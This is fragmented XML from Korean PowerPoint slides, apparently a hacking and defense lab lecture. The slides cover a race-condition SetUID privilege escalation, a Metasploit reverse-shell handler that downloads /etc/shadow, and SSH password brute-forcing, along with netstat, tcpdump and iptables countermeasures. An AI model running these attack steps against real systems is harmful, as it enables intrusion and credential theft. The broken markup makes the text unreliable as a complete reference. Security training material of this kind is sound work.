<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide5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98.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image149.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide53.xml"/><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50.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9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155.gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image154.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image153.b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3584033443"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4451847" y="2813240"/>
          <a:ext cx="3288306" cy="1477328"/>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8013425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Race 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통해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Race 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Race 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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36027875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 이동 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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cd /sec</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ ls –l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile.c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dirty="0" err="1"/>
              <a:t>createTempFile.c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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 테스트</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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넣은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tempfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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/sec/exploit.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 작성</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ vim /sec/exploit.sh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dirty="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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1491760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/sec/exploit.sh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/sec/exploit.sh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/sec/exploit.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행 및 권한 상승을 통한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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/sec/exploit.sh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new=`ls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while [ "$old" == "$new"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new=`ls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/sec/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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-s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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>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echo "STOP... The passwd file has ben changed"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new=`ls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while [ "$old" == "$new"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new=`ls -l /</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21533230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new=`ls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while [ "$old" == "$new"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new=`ls -l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(context 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의해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585575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tempfile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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11062957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createTempFile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Race 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   Race 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Race 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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29802422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 이동 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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cd /sec</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ls –l /sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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createTempFile.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 코드 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile.c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dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tempfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>remove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>제거 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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createTempFile</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createTempFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile.c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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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u+s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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31837202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msfconsole</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9442823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Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>콘솔에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>use exploit/multi/handler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> &gt; use exploit/multi/handler</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Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>콘솔에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>set PAYLOAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> exploit(handler) &gt; set PAYLOAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> exploit(handler)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2704005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dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> exploit(handler) &gt; set RHOST 10.10.1.14 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> exploit(handler) &gt; exploit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dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> &gt;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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다운로드</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> &gt; download /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>종료</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> &gt; exit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> exploit(handler) &gt; exit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dirty="0" err="1"/>
              <a:t>다운로드받은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력 및 다운로드 받은 파일 이름 입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99691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dirty="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370601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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23943698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netstat -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tnap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령으로 열린 포트 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># netstat -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tnap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | more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–w packet.txt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–r packet.txt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dirty="0"/>
              <a:t># netstat -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tnap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | more</a:t>
            </a:r>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-name </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>linux.elf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5050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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/elf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dirty="0" err="1"/>
              <a:t>linux.elf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dirty="0" err="1"/>
              <a:t>linux.elf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41645562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24364624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–l test01 –P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/share/wordlists/rockyou.txt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dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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dirty="0"/>
              <a:t># exit</a:t>
            </a:r>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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 알아낸 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>test01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정의 비밀번호 입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>test123</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23347054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–w packet.txt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 packet.txt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iptables -A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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35286648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dirty="0"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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passwd test01</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dirty="0"/>
              <a:t># iptables –A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3972431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hping3, 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hping3, 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hping3, WireShark, iftop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TCP Session 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ettercap</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00705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95454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NIS(Network Information Service)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서비스는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있도록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174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python_test.py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python_test.py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python_test.py”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dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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0627762" y="-30288"/>
            <a:ext cx="597159" cy="380332"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="380332"/>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246221"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>강의안</a:t>
              </a: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3" name="그룹 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11C36FBC-D32E-4CD5-8FC6-A2DA3F90F4CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11140752" y="-32218"/>
            <a:ext cx="597159" cy="380332"/>
            <a:chOff x="11140752" y="-32218"/>
            <a:chExt cx="597159" cy="380332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="사각형: 둥근 모서리 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF860FEB-C9E0-4FF0-BD38-24F3489DF14D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11170169" y="9975"/>
              <a:ext cx="464911" cy="338139"/>
            </a:xfrm>
            <a:prstGeom prst="round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83A43895-A799-48F9-8CBF-59ADA30BAF94}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11140752" y="-32218"/>
              <a:ext cx="597159" cy="246221"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" dirty="0">
                  <a:solidFill>
